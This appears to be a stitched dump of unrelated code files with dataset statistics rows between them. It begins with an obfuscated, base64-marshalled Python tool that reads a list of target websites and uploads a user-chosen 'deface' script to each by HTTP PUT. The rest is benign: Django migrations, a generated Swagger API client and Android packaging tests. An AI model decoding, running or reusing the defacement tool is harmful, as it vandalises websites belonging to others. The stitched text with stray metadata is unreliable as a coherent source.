I4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWdICAgICAgICAgICAKICAgICAgICDilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKWiOKWiOKWiOKVlyAg4paI4paI4paI4paI4paI4pWXICDilojilojilojilojilojilojilojilZHilojilojilZEgICAgIOKWiOKWiOKWiOKWiOKWiOKVlyAgICAgICAgICAgICAKICAgICAgICDilojilojilZEgIOKWiOKWiOKVkeKWiOKWiOKVlOKVkOKVkOKVnSAg4paI4paI4pWU4pWQ4pWQ4pWdICDilojilojilZTilZDilZDilojilojilZHilojilojilZEgICAgIOKWiOKWiOKVlOKVkOKVkOKVnSAgICAgICAgICAgICAKICAgICAgICDilojilojilojilojilojilojilZTilZ3ilojilojilojilojilojilojilojilZfilojilojilZEgICAgIOKWiOKWiOKVkSAg4paI4paI4pWR4pWa4paI4paI4paI4paI4paI4paI4pWX4paI4paI4paI4paI4paI4paI4paI4pWXICAgICAgICAgICAKICAgICAgICDilZrilZDilZDilZDilZDilZDilZ0g4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWd4pWa4pWQ4pWdICAgICDilZrilZDilZ0gIOKVmuKVkOKVnSDilZrilZDilZDilZDilZDilZDilZ3ilZrilZDilZDilZDilZDilZDilZDilZ0gICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCgoKcwUAAAAbWzMxbXMFAAAAG1szMm1zBQAAABtbMDBtYwEAAAACAAAAAgAAAEMAAABzPQAAAGQBAH0BAHQAAGoBAGoCAGQCAGsEAHInAHQDAHwAAIMBAH0BAG4MAHQEAHwAAIMBAH0BAHQFAHwBAIMBAFMoAwAAAE50AAAAAGkCAAAAKAYAAAB0AwAAAHN5c3QMAAAAdmVyc2lvbl9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")))
| 1,057.6
| 5,213
| 0.99357
| 24
| 5,288
| 218.916667
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064039
| 0.001891
| 5,288
| 5
| 5,213
| 1,057.6
| 0.931413
| 0.007943
| 0
| 0
| 0
| 0
| 0.986082
| 0.986082
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
6f3f390afcbc05ad932ae9c81ad63a4061564d82
| 4,563
|
py
|
Python
|
flows/migrations/0001_initial.py
|
stornado/zinga
|
4791d06f153a69a1ed502022b58d4af9c77c5659
|
[
"MIT"
] | null | null | null |
flows/migrations/0001_initial.py
|
stornado/zinga
|
4791d06f153a69a1ed502022b58d4af9c77c5659
|
[
"MIT"
] | null | null | null |
flows/migrations/0001_initial.py
|
stornado/zinga
|
4791d06f153a69a1ed502022b58d4af9c77c5659
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.2 on 2018-10-14 16:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema migration for the ``flows`` app.

    NOTE(review): Django-generated; by convention applied migrations are
    never edited in place — make schema changes in a follow-up migration.
    """

    # First migration of this app: no prerequisites.
    initial = True

    dependencies = [
    ]

    operations = [
        # Common task fields shared by task-like models.
        migrations.CreateModel(
            name='BaseTaskModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=50, verbose_name='Title')),
                ('description', models.TextField(verbose_name='Description')),
                ('active', models.BooleanField(default=True, verbose_name='Status')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),
                # NOTE(review): verbose_name 'Create Time' on update_time looks
                # like a copy-paste slip in the model — confirm upstream.
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='Create Time')),
            ],
        ),
        # Named recipient group for notification mails.
        migrations.CreateModel(
            name='MailGroup',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=25, verbose_name='Name')),
                ('description', models.TextField(verbose_name='Description')),
                ('active', models.BooleanField(default=True, verbose_name='Status')),
            ],
        ),
        # Cron-driven recurring task.
        migrations.CreateModel(
            name='Periodic',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=50, verbose_name='Title')),
                ('description', models.TextField(verbose_name='Description')),
                ('running', models.BooleanField(default=False, verbose_name='Run Status')),
                ('need_mail', models.BooleanField(default=False, verbose_name='Notify')),
                ('result_url', models.URLField(verbose_name='Result URL')),
                ('active', models.BooleanField(default=True, verbose_name='Status')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='Create Time')),
                ('cron', models.CharField(max_length=50, verbose_name='Cron')),
                # NOTE(review): null=True has no effect on ManyToManyField
                # (Django warning fields.W340); harmless here, fix in the model.
                ('mail_receivers', models.ManyToManyField(blank=True, null=True, to='flows.MailGroup', verbose_name='Receivers')),
            ],
            options={
                'ordering': ('-active', '-running', 'update_time'),
                'abstract': False,
            },
        ),
        # One-shot scheduled task with an explicit time window.
        migrations.CreateModel(
            name='Schedule',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=50, verbose_name='Title')),
                ('description', models.TextField(verbose_name='Description')),
                ('running', models.BooleanField(default=False, verbose_name='Run Status')),
                ('need_mail', models.BooleanField(default=False, verbose_name='Notify')),
                ('result_url', models.URLField(verbose_name='Result URL')),
                ('active', models.BooleanField(default=True, verbose_name='Status')),
                ('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Create Time')),
                ('update_time', models.DateTimeField(auto_now=True, verbose_name='Create Time')),
                ('start_time', models.DateTimeField(verbose_name='Start Time')),
                ('end_time', models.DateTimeField(blank=True, null=True, verbose_name='End Time')),
                ('duration', models.DurationField(verbose_name='Duration')),
                ('expire_time', models.DateTimeField(verbose_name='Expire Time')),
                ('mail_receivers', models.ManyToManyField(blank=True, null=True, to='flows.MailGroup', verbose_name='Receivers')),
            ],
            options={
                'ordering': ('-active', '-running', 'update_time'),
                'abstract': False,
            },
        ),
        # Multi-table-inheritance child of BaseTaskModel.
        migrations.CreateModel(
            name='CaseExcuteTask',
            fields=[
                ('basetaskmodel_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='flows.BaseTaskModel')),
            ],
            bases=('flows.basetaskmodel',),
        ),
    ]
| 53.05814
| 203
| 0.593688
| 440
| 4,563
| 5.977273
| 0.2
| 0.146388
| 0.062738
| 0.061597
| 0.762357
| 0.736502
| 0.724335
| 0.710266
| 0.710266
| 0.710266
| 0
| 0.007401
| 0.259698
| 4,563
| 85
| 204
| 53.682353
| 0.771166
| 0.009862
| 0
| 0.705128
| 1
| 0
| 0.171612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025641
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f44de184b0d498a91e687459c6c773ec7874e04
| 2,350
|
py
|
Python
|
django/policy/migrations/0007_auto_20171025_0901.py
|
zoonoo/aws2
|
583d8ee144c8b5c422a706d8054716c13d064899
|
[
"MIT"
] | null | null | null |
django/policy/migrations/0007_auto_20171025_0901.py
|
zoonoo/aws2
|
583d8ee144c8b5c422a706d8054716c13d064899
|
[
"MIT"
] | null | null | null |
django/policy/migrations/0007_auto_20171025_0901.py
|
zoonoo/aws2
|
583d8ee144c8b5c422a706d8054716c13d064899
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-25 09:01
from __future__ import unicode_literals
from decimal import Decimal
from django.db import migrations
import djmoney.models.fields
class Migration(migrations.Migration):
    """Auto-generated migration adding dual-currency (KRW/USD) price fields.

    NOTE(review): Django-generated; by convention applied migrations are
    never edited in place — make schema changes in a follow-up migration.
    """

    dependencies = [
        ('policy', '0006_auto_20171025_0144'),
    ]

    operations = [
        # djmoney stores each MoneyField as value + companion currency column;
        # these AddField/AlterField pairs introduce the currency columns and
        # pin decimal precision per currency (KRW has no decimal places).
        migrations.AddField(
            model_name='accommodationoption',
            name='price_krw_currency',
            field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='KRW', editable=False, max_length=3),
        ),
        migrations.AddField(
            model_name='accommodationoption',
            name='price_usd_currency',
            field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='USD', editable=False, max_length=3),
        ),
        migrations.AddField(
            model_name='price',
            name='price_krw_currency',
            field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='KRW', editable=False, max_length=3),
        ),
        migrations.AddField(
            model_name='price',
            name='price_usd_currency',
            field=djmoney.models.fields.CurrencyField(choices=[('KRW', 'KRW'), ('USD', 'USD')], default='USD', editable=False, max_length=3),
        ),
        migrations.AlterField(
            model_name='accommodationoption',
            name='price_krw',
            field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='KRW', max_digits=7),
        ),
        migrations.AlterField(
            model_name='accommodationoption',
            name='price_usd',
            field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='USD', max_digits=4),
        ),
        migrations.AlterField(
            model_name='price',
            name='price_krw',
            field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='KRW', max_digits=7),
        ),
        migrations.AlterField(
            model_name='price',
            name='price_usd',
            field=djmoney.models.fields.MoneyField(decimal_places=0, default=Decimal('0'), default_currency='USD', max_digits=4),
        ),
    ]
| 40.517241
| 141
| 0.615319
| 248
| 2,350
| 5.653226
| 0.237903
| 0.077033
| 0.121969
| 0.136947
| 0.833096
| 0.833096
| 0.833096
| 0.71826
| 0.71826
| 0.71826
| 0
| 0.027374
| 0.238298
| 2,350
| 57
| 142
| 41.22807
| 0.755866
| 0.028936
| 0
| 0.8
| 1
| 0
| 0.135586
| 0.010092
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.08
| 0
| 0.14
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f6eba6ddb41ea6516d104103038af76231259df
| 150
|
py
|
Python
|
dataset/__init__.py
|
wheeltune/kid-neuro
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
[
"MIT"
] | null | null | null |
dataset/__init__.py
|
wheeltune/kid-neuro
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
[
"MIT"
] | null | null | null |
dataset/__init__.py
|
wheeltune/kid-neuro
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
[
"MIT"
] | null | null | null |
from .events_dataset import *
from .keystrokes_dataset import *
from .kid_dataset import *
from .multi_dataset import *
from .timing_dataset import *
| 25
| 33
| 0.8
| 20
| 150
| 5.75
| 0.4
| 0.565217
| 0.591304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 150
| 5
| 34
| 30
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48b89505f2adbbf9bccdfb2ca9b5674ee0e760c4
| 12,969
|
py
|
Python
|
python/swagger_client/api/base_controller_api.py
|
Naras/knowledgetreeRestClients
|
4c79cb091a91bafe37fa2f0d0301245d086c2e5b
|
[
"MIT"
] | null | null | null |
python/swagger_client/api/base_controller_api.py
|
Naras/knowledgetreeRestClients
|
4c79cb091a91bafe37fa2f0d0301245d086c2e5b
|
[
"MIT"
] | null | null | null |
python/swagger_client/api/base_controller_api.py
|
Naras/knowledgetreeRestClients
|
4c79cb091a91bafe37fa2f0d0301245d086c2e5b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
OpenAPI definition
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class BaseControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind this API facade to *api_client*, creating a default ApiClient
    when none is supplied."""
    self.api_client = api_client if api_client is not None else ApiClient()
def get_person_root(self, **kwargs):  # noqa: E501
    """get root person  # noqa: E501

    Fetch the root node for person. Synchronous by default; pass
    ``async_req=True`` for an asynchronous request.

    >>> thread = api.get_person_root(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: PersonResource
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Async callers get the thread back directly; sync callers unwrap data.
    if kwargs.get('async_req'):
        return self.get_person_root_with_http_info(**kwargs)  # noqa: E501
    (data) = self.get_person_root_with_http_info(**kwargs)  # noqa: E501
    return data
def get_person_root_with_http_info(self, **kwargs):  # noqa: E501
    """get root person  # noqa: E501

    get the root node for person  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_person_root_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: PersonResource
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of keyword arguments this generated endpoint accepts.
    all_params = []  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject unknown kwargs, then flatten the accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_person_root" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    # This endpoint takes no path/query/form parameters and no body.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['kapi auth']  # noqa: E501

    # Delegate the actual HTTP call to the shared ApiClient.
    return self.api_client.call_api(
        '/v1/rootperson', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PersonResource',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_subject_root(self, **kwargs):  # noqa: E501
    """get root subject  # noqa: E501

    Fetch the root node for subject. Synchronous by default; pass
    ``async_req=True`` for an asynchronous request.

    >>> thread = api.get_subject_root(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: SubjectResource
        If the method is called asynchronously, returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    # Async callers get the thread back directly; sync callers unwrap data.
    if kwargs.get('async_req'):
        return self.get_subject_root_with_http_info(**kwargs)  # noqa: E501
    (data) = self.get_subject_root_with_http_info(**kwargs)  # noqa: E501
    return data
def get_subject_root_with_http_info(self, **kwargs): # noqa: E501
"""get root subject # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_subject_root_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: SubjectResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_subject_root" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['kapi auth'] # noqa: E501
return self.api_client.call_api(
'/v1/rootsubject', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SubjectResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_work_root(self, **kwargs): # noqa: E501
"""get root work # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_work_root(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WorkResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_work_root_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_work_root_with_http_info(**kwargs) # noqa: E501
return data
def get_work_root_with_http_info(self, **kwargs): # noqa: E501
"""get root work # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_work_root_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WorkResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_work_root" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['kapi auth'] # noqa: E501
return self.api_client.call_api(
'/v1/rootwork', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def healthcheck(self, **kwargs): # noqa: E501
"""healthcheck # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.healthcheck(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: BuildProperties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.healthcheck_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.healthcheck_with_http_info(**kwargs) # noqa: E501
return data
def healthcheck_with_http_info(self, **kwargs): # noqa: E501
"""healthcheck # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.healthcheck_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: BuildProperties
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method healthcheck" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1/health', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildProperties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 34.128947
| 119
| 0.594957
| 1,462
| 12,969
| 5.008208
| 0.100547
| 0.051352
| 0.030593
| 0.039334
| 0.916826
| 0.916826
| 0.908905
| 0.890057
| 0.887053
| 0.87162
| 0
| 0.017148
| 0.316524
| 12,969
| 379
| 120
| 34.218997
| 0.80889
| 0.321536
| 0
| 0.781726
| 1
| 0
| 0.143301
| 0.03284
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045685
| false
| 0
| 0.020305
| 0
| 0.13198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2b33acdf0c9289821aa1ef013b366f000a129d9
| 2,330
|
py
|
Python
|
wrt/wrt-packertool2-android-tests/packertool2/indextest.py
|
yugang/crosswalk-test-suite
|
c02e50b7901f0ccd7b42028460c907465f0cb682
|
[
"BSD-3-Clause"
] | null | null | null |
wrt/wrt-packertool2-android-tests/packertool2/indextest.py
|
yugang/crosswalk-test-suite
|
c02e50b7901f0ccd7b42028460c907465f0cb682
|
[
"BSD-3-Clause"
] | null | null | null |
wrt/wrt-packertool2-android-tests/packertool2/indextest.py
|
yugang/crosswalk-test-suite
|
c02e50b7901f0ccd7b42028460c907465f0cb682
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import unittest
import os, sys, commands
import comm
class TestPackertoolsFunctions(unittest.TestCase):
def test_index1(self):
comm.setUp()
cmd = "python %smake_apk.py --package=org.hello.world --name=world --arch=%s --mode=%s --app-root=%s --app-local-path=%s" % \
(comm.Pck_Tools, comm.ARCH, comm.MODE, comm.APP_PATH, comm.INDEX_PATH[0])
packstatus = commands.getstatusoutput(cmd)
if packstatus[0] == 0:
print "Generate APK ----------------> OK!"
result = commands.getstatusoutput("ls")
self.assertIn(comm.AppName, result[1])
else:
print "Generate APK ----------------> Error!"
result = commands.getstatusoutput("ls")
self.assertNotIn(comm.AppName, result[1])
os.remove(comm.AppName)
def test_index2(self):
comm.setUp()
cmd = "python %smake_apk.py --package=org.hello.world --name=world --arch=%s --mode=%s --app-root=%s --app-local-path=%s" % \
(comm.Pck_Tools, comm.ARCH, comm.MODE, comm.APP_PATH, comm.INDEX_PATH[1])
packstatus = commands.getstatusoutput(cmd)
if packstatus[0] == 0:
print "Generate APK ----------------> OK!"
result = commands.getstatusoutput("ls")
self.assertIn(comm.AppName, result[1])
else:
print "Generate APK ----------------> Error!"
result = commands.getstatusoutput("ls")
self.assertNotIn(comm.AppName, result[1])
os.remove(comm.AppName)
def test_index3(self):
comm.setUp()
cmd = "python %smake_apk.py --package=org.hello.world --name=world --arch=%s --mode=%s --app-root=%s --app-local-path=%s" % \
(comm.Pck_Tools, comm.ARCH, comm.MODE, comm.APP_PATH, comm.INDEX_PATH[2])
packstatus = commands.getstatusoutput(cmd)
if packstatus[0] == 0:
print "Generate APK ----------------> OK!"
result = commands.getstatusoutput("ls")
self.assertIn(comm.AppName, result[1])
else:
print "Generate APK ----------------> Error!"
result = commands.getstatusoutput("ls")
self.assertNotIn(comm.AppName, result[1])
os.remove(comm.AppName)
# Run the packer-tool test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| 41.607143
| 133
| 0.572103
| 270
| 2,330
| 4.851852
| 0.211111
| 0.158015
| 0.073282
| 0.141985
| 0.883206
| 0.883206
| 0.883206
| 0.883206
| 0.883206
| 0.883206
| 0
| 0.01028
| 0.248498
| 2,330
| 55
| 134
| 42.363636
| 0.737864
| 0.008584
| 0
| 0.75
| 0
| 0.0625
| 0.247726
| 0.032482
| 0
| 0
| 0
| 0
| 0.125
| 0
| null | null | 0
| 0.0625
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2e76aa33c87c047d0f7d56a1cf210ef02df1f72
